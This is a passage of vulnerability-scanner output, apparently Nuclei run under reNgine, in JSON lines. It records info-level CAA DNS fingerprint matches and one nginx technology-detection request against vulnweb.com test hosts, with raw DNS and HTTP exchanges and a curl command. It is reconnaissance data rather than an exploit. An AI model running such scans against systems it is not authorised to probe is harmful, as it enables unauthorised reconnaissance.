(CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"rest.vulnweb.com\",\"matched-at\":\"rest.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 42935\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 42935\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.283828006Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testasp.vulnweb.com\",\"matched-at\":\"testasp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 42944\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 42944\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.285915572Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testasp.vulnweb.com\",\"matched-at\":\"testasp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 52624\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 52624\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.286110243Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"rest.vulnweb.com\",\"matched-at\":\"rest.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 6216\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 6216\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.286119723Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 18158\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 18158\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.28630879Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 49744\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 49744\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.286339256Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 58962\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 58962\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.286345355Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testaspnet.vulnweb.com\",\"matched-at\":\"testaspnet.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 55638\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testaspnet.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 55638\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testaspnet.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.286884972Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 3184\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 3184\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.28729796Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 35146\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 35146\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.287395593Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testasp.vulnweb.com\",\"matched-at\":\"testasp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 5487\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 5487\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.287833728Z\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:35.624341903Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 42777\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 42777\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86397\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:36.205113854Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 15573\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 15573\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86397\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:36.20529935Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 15116\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 15116\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86399\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:36.206428335Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 1707\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 1707\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86399\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:36.207565002Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 11520\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 11520\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; 